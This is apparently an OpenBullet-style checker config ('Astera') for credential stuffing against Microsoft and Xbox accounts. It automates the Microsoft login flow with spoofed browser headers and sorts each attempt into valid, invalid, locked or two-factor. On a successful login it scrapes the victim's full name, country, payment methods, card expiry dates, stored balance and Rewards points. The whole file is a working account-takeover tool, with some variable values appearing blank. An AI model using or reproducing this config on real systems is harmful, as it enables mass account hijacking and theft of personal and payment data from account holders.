#Astera FUNCTION GetRandomUA -> VAR "UA" FUNCTION Constant "" -> VAR "U" REQUEST GET "https://login.microsoftonline.com/consumers/oauth2/v2.0/authorize?client_id=1f907974-e22b-4810-a9de-d9647380c97e&scope=xboxlive.signin%20openid%20profile%20offline_access&redirect_uri=https%3A%2F%2Fwww.xbox.com%2Fauth%2Fmsa%3Faction%3DloggedIn%26locale_hint%3Dfr-FR&client-request-id=cd3153b2-2925-46f5-b430-5e5ca94ca093&response_mode=fragment&response_type=code&x-client-SKU=msal.js.browser&x-client-VER=2.32.2&client_info=1&code_challenge=sdjKrwpw8rCFTYQ9591TecWj5jRf75U8cCwf9ZOCCZM&code_challenge_method=S256&prompt=login&nonce=2b73f1f3-6f19-49d0-be0d-96dde499215c&state=eyJpZCI6IjhhZTNjMTNhLTVmMmEtNDdmOS1iNDhkLTQxYmU3ZjQwNzk3YiIsIm1ldGEiOnsiaW50ZXJhY3Rpb25UeXBlIjoicmVkaXJlY3QifX0%3D%7Chttps%253A%252F%252Fwww.xbox.com%252Ffr-FR%252Flive" HEADER "Host: login.microsoftonline.com" HEADER "Connection: keep-alive" HEADER "sec-ch-ua: \"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google Chrome\";v=\"120\"" HEADER "sec-ch-ua-mobile: ?0" HEADER "sec-ch-ua-platform: \"Windows\"" HEADER "Upgrade-Insecure-Requests: 1" HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" HEADER "Sec-Fetch-Site: cross-site" HEADER "Sec-Fetch-Mode: navigate" HEADER "Sec-Fetch-Dest: document" HEADER "Referer: https://www.xbox.com/" HEADER "Accept-Language: fr-FR,fr;q=0.9" HEADER "Accept-Encoding: gzip, deflate" KEYCHECK BanOnToCheck=FALSE KEYCHAIN Retry OR KEY "" NotEqualTo "200" KEYCHAIN Failure OR KEY "sErrTxt:'Your account or password is incorrect." KEY "urlPost:'" PARSE "" LR "uaid=" "\\" -> VAR "uaid" PARSE "" LR "state=" "\\" -> VAR "state" PARSE "" LR "" "" -> VAR "Hpgrequestid" PARSE "" LR "\"hpgact\":" "," -> VAR "Hpgact" PARSE "" LR "id=\"i0327\" value=\"" "\"" -> VAR "PP" PARSE "" LR "https://login.live.com/GetCredentialType.srf?opid=" "'" -> VAR "AD" "https://login.live.com/GetCredentialType.srf?opid=" "" PARSE "

" LR "uaid=" "&" -> VAR "UID" PARSE "" LR "https://login.live.com/ppsecure/post.srf?client_id=" "'" -> VAR "AD2" "https://login.live.com/ppsecure/post.srf?client_id=" "" REQUEST POST "" CONTENT "{\"username\":\"\",\"uaid\":\"\",\"isOtherIdpSupported\":false,\"checkPhones\":false,\"isRemoteNGCSupported\":true,\"isCookieBannerShown\":false,\"isFidoSupported\":true,\"forceotclogin\":false,\"otclogindisallowed\":false,\"isExternalFederationDisallowed\":false,\"isRemoteConnectSupported\":false,\"federationFlags\":3,\"isSignup\":false,\"flowToken\":\"\"}" CONTENTTYPE "application/json" HEADER "Host: login.live.com" HEADER "Connection: keep-alive" HEADER "sec-ch-ua: \"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google Chrome\";v=\"120\"" HEADER "sec-ch-ua-mobile: ?0" HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" HEADER "client-request-id: " HEADER "Content-type: application/json; charset=UTF-8" HEADER "hpgid: 33" HEADER "Accept: application/json" HEADER "hpgact: 0" HEADER "sec-ch-ua-platform: \"Windows\"" HEADER "Origin: https://login.live.com" HEADER "Sec-Fetch-Site: same-origin" HEADER "Sec-Fetch-Mode: cors" HEADER "Sec-Fetch-Dest: empty" HEADER "Referer:

" HEADER "Accept-Language: fr-FR,fr;q=0.9" HEADER "Accept-Encoding: gzip, deflate" KEYCHECK KEYCHAIN Failure OR KEY "" DoesNotContain "\"HasPassword\":1" KEY "sErrTxt:'That Microsoft account doesn\\'t exist." KEYCHAIN Success OR KEY "\"HasPassword\":1" FUNCTION URLEncode "" -> VAR "US" FUNCTION URLEncode "" -> VAR "PS" FUNCTION URLEncode "" -> VAR "PP2" REQUEST POST "" CONTENT "i13=0&login=&loginfmt=&type=11&LoginOptions=3&lrt=&lrtPartition=&hisRegion=&hisScaleUnit=&passwd=&ps=2&psRNGCDefaultType=&psRNGCEntropy=&psRNGCSLK=&canary=&ctx=&hpgrequestid=&PPFT=&PPSX=Passpor&NewUser=1&FoundMSAs=&fspost=0&i21=0&CookieDisclosure=0&IsFidoSupported=1&isSignupPost=0&isRecoveryAttemptPost=0&i19=9495" CONTENTTYPE "application/x-www-form-urlencoded" HEADER "Host: login.live.com" HEADER "Connection: keep-alive" HEADER "Cache-Control: max-age=0" HEADER "sec-ch-ua: \"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google Chrome\";v=\"120\"" HEADER "sec-ch-ua-mobile: ?0" HEADER "sec-ch-ua-platform: \"Windows\"" HEADER "Upgrade-Insecure-Requests: 1" HEADER "Origin: https://login.live.com" HEADER "Content-Type: application/x-www-form-urlencoded" HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" HEADER "Sec-Fetch-Site: same-origin" HEADER "Sec-Fetch-Mode: navigate" HEADER "Sec-Fetch-User: ?1" HEADER "Sec-Fetch-Dest: document" HEADER "Referer:

" HEADER "Accept-Language: fr-FR,fr;q=0.9" HEADER "Accept-Encoding: gzip, deflate" KEYCHECK KEYCHAIN Failure OR KEY "Votre compte ou mot de passe est incorrect." KEYCHAIN Success AND KEY "" Contains "__Host-MSAAUTH" KEY "" EqualTo "200" KEYCHAIN Custom "LOCK ACCOUNT" OR KEY "https://account.live.com/ar/cancel?" KEY "Vous avez essayé de vous connecter trop de fois avec un compte ou un mot de passe " KEY "action=\"https://account.live.com/Abuse?" KEYCHAIN Retry OR KEY "" NotEqualTo "200" KEYCHAIN Custom "2FACTOR" OR KEY "incorrectsaction=\"https://account.live.com/identity/confirm?" KEY "action=\"https://account.live.com/recover?" PARSE "" LR "],urlPost:'" "'" -> VAR "PSOT" REQUEST POST "" CONTENT "LoginOptions=1&type=28&ctx=&hpgrequestid=&PPFT=&i19=3819" CONTENTTYPE "application/x-www-form-urlencoded" HEADER "Host: login.live.com" HEADER "Connection: keep-alive" HEADER "Cache-Control: max-age=0" HEADER "sec-ch-ua: \"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google Chrome\";v=\"120\"" HEADER "sec-ch-ua-mobile: ?0" HEADER "sec-ch-ua-platform: \"Windows\"" HEADER "Upgrade-Insecure-Requests: 1" HEADER "Origin: https://login.live.com" HEADER "Content-Type: application/x-www-form-urlencoded" HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" HEADER "Sec-Fetch-Site: same-origin" HEADER "Sec-Fetch-Mode: navigate" HEADER "Sec-Fetch-User: ?1" HEADER "Sec-Fetch-Dest: document" HEADER "Referer:

" HEADER "Accept-Language: fr-FR,fr;q=0.9" HEADER "Accept-Encoding: gzip, deflate" KEYCHECK BanOnToCheck=FALSE KEYCHAIN Retry OR KEY "" NotEqualTo "200" KEY "

" DoesNotContain "https://www.xbox.com/" REQUEST GET "https://account.microsoft.com/?ref=MeControl&username=" HEADER "Host: account.microsoft.com" HEADER "Connection: keep-alive" HEADER "sec-ch-ua: \"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google Chrome\";v=\"120\"" HEADER "sec-ch-ua-mobile: ?0" HEADER "sec-ch-ua-platform: \"Windows\"" HEADER "Upgrade-Insecure-Requests: 1" HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" HEADER "Sec-Fetch-Site: cross-site" HEADER "Sec-Fetch-Mode: navigate" HEADER "Sec-Fetch-User: ?1" HEADER "Sec-Fetch-Dest: document" HEADER "Referer: https://www.xbox.com/" HEADER "Accept-Language: fr-FR,fr;q=0.9" HEADER "Accept-Encoding: gzip, deflate" KEYCHECK BanOnToCheck=FALSE KEYCHAIN Retry OR KEY "" NotEqualTo "200" PARSE "" CSS "[name=\"NAPExp\"]" "value" EncodeOutput=TRUE -> VAR "NAPExp" PARSE "" CSS "[name=\"pprid\"]" "value" EncodeOutput=TRUE -> VAR "pprid2" PARSE "" CSS "[name=\"NAP\"]" "value" EncodeOutput=TRUE -> VAR "NAP" PARSE "" CSS "[name=\"ANON\"]" "value" EncodeOutput=TRUE -> VAR "ANON" PARSE "" CSS "[name=\"ANONExp\"]" "value" EncodeOutput=TRUE -> VAR "ANONExp" PARSE "" CSS "[name=\"t\"]" "value" EncodeOutput=TRUE -> VAR "TOTT" REQUEST POST "https://account.microsoft.com/auth/complete-signin?ru=https%3A%2F%2Faccount.microsoft.com%2F%3Fref%3DMeControl%26refd%3Dwww.xbox.com&wa=wsignin1.0" ReadResponseSource=FALSE CONTENT "NAPExp=&pprid=&NAP=&ANON=&ANONExp=&t=" CONTENTTYPE "application/x-www-form-urlencoded" HEADER "Host: account.microsoft.com" HEADER "Connection: keep-alive" HEADER "Cache-Control: max-age=0" HEADER "sec-ch-ua: \"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google Chrome\";v=\"120\"" HEADER "sec-ch-ua-mobile: ?0" HEADER "sec-ch-ua-platform: \"Windows\"" HEADER "Upgrade-Insecure-Requests: 1" HEADER "Origin: https://login.live.com" HEADER "Content-Type: application/x-www-form-urlencoded" HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" HEADER "Sec-Fetch-Site: cross-site" HEADER "Sec-Fetch-Mode: navigate" HEADER "Sec-Fetch-Dest: document" HEADER "Referer: https://login.live.com/" HEADER "Accept-Language: fr-FR,fr;q=0.9" HEADER "Accept-Encoding: gzip, deflate" KEYCHECK BanOnToCheck=FALSE KEYCHAIN Retry OR KEY "" NotEqualTo "200" KEY "

" DoesNotContain "https://account.microsoft.com/" REQUEST GET "https://account.microsoft.com/?ref=MeControl&refd=www.xbox.com" HEADER "Host: account.microsoft.com" HEADER "Connection: keep-alive" HEADER "Cache-Control: max-age=0" HEADER "Upgrade-Insecure-Requests: 1" HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" HEADER "Sec-Fetch-Site: cross-site" HEADER "Sec-Fetch-Mode: navigate" HEADER "Sec-Fetch-Dest: document" HEADER "sec-ch-ua: \"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google Chrome\";v=\"120\"" HEADER "sec-ch-ua-mobile: ?0" HEADER "sec-ch-ua-platform: \"Windows\"" HEADER "Referer: https://login.live.com/" HEADER "Accept-Language: fr-FR,fr;q=0.9" HEADER "Accept-Encoding: gzip, deflate" KEYCHECK BanOnToCheck=FALSE KEYCHAIN Retry OR KEY "" NotEqualTo "200" PARSE "" CSS "[name=\"__RequestVerificationToken\"]" "value" -> VAR "TOKOK" REQUEST GET "https://account.microsoft.com/home/api/profile/personal-info" HEADER "Host: account.microsoft.com" HEADER "Connection: keep-alive" HEADER "sec-ch-ua: \"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google Chrome\";v=\"120\"" HEADER "sec-ch-ua-mobile: ?0" HEADER "Correlation-Context: v=1,ms.b.tel.market=it-IT" HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" HEADER "Accept: application/json, text/plain, */*" HEADER "X-Requested-With: XMLHttpRequest" HEADER "__RequestVerificationToken: " HEADER "sec-ch-ua-platform: \"Windows\"" HEADER "Sec-Fetch-Site: same-origin" HEADER "Sec-Fetch-Mode: cors" HEADER "Sec-Fetch-Dest: empty" HEADER "Referer: https://account.microsoft.com/?ref=MeControl&refd=www.xbox.com" HEADER "Accept-Language: fr-FR,fr;q=0.9" HEADER "Accept-Encoding: gzip, deflate" KEYCHECK BanOnToCheck=FALSE KEYCHAIN Retry OR KEY "" NotEqualTo "200" PARSE "" JSON "fullName" CreateEmpty=FALSE -> CAP "Full Name" PARSE "" JSON "countryCode" Recursive=TRUE CreateEmpty=FALSE -> CAP "Country" REQUEST GET "https://account.microsoft.com/home/api/payment-instruments/pi-summary" HEADER "Host: account.microsoft.com" HEADER "Connection: keep-alive" HEADER "sec-ch-ua: \"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google Chrome\";v=\"120\"" HEADER "sec-ch-ua-mobile: ?0" HEADER "Correlation-Context: v=1,ms.b.tel.market=it-IT" HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" HEADER "Accept: application/json, text/plain, */*" HEADER "X-Requested-With: XMLHttpRequest" HEADER "__RequestVerificationToken: " HEADER "sec-ch-ua-platform: \"Windows\"" HEADER "Sec-Fetch-Site: same-origin" HEADER "Sec-Fetch-Mode: cors" HEADER "Sec-Fetch-Dest: empty" HEADER "Referer:

" HEADER "Accept-Language: fr-FR,fr;q=0.9" HEADER "Accept-Encoding: gzip, deflate" KEYCHECK BanOnToCheck=FALSE KEYCHAIN Retry OR KEY "" NotEqualTo "200" KEYCHECK BanOnToCheck=FALSE KEYCHAIN Custom "NO PAYMENT DETAIL" OR KEY "\"paymentInstruments\":[]" PARSE "" JSON "name" Recursive=TRUE CreateEmpty=FALSE -> CAP "Payment Method" PARSE "" JSON "expirationDate" Recursive=TRUE CreateEmpty=FALSE -> CAP "Exp Date" PARSE "" JSON "isValid" CreateEmpty=FALSE -> CAP "Is Valid?" PARSE "" JSON "storedValueDetails" CreateEmpty=FALSE -> CAP "stored Value Details" PARSE "" JSON "isStoredValue" CreateEmpty=FALSE -> CAP "is Stored Value?" PARSE "" JSON "isDeclined" CreateEmpty=FALSE -> CAP "is Declined?" PARSE "" JSON "isExpired" CreateEmpty=FALSE -> CAP "Is Payment Expire?" PARSE "" JSON "balance" CreateEmpty=FALSE -> CAP "Available Balance" REQUEST GET "https://account.microsoft.com/home/api/rewards/rewards-summary?refd=account.microsoft.com" HEADER "Host: account.microsoft.com" HEADER "Correlation-Context: v=1,ms.b.tel.market=en-US" HEADER "Sec-Fetch-Site: same-origin" HEADER "X-Requested-With: XMLHttpRequest" HEADER "MS-CV: " HEADER "Accept-Language: en-US,en;q=0.9" HEADER "Accept-Encoding: gzip, deflate, br" HEADER "Sec-Fetch-Mode: cors" HEADER "Accept: application/json, text/plain, */*" HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 16_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1" HEADER "Referer: https://account.microsoft.com/?refd=account.microsoft.com" HEADER "Connection: close" HEADER "__RequestVerificationToken: " HEADER "Sec-Fetch-Dest: empty" #PointsBalance PARSE "" JSON "balance" CreateEmpty=FALSE -> CAP "Points Balance" FUNCTION Constant ":)" -> CAP "Nice Joy"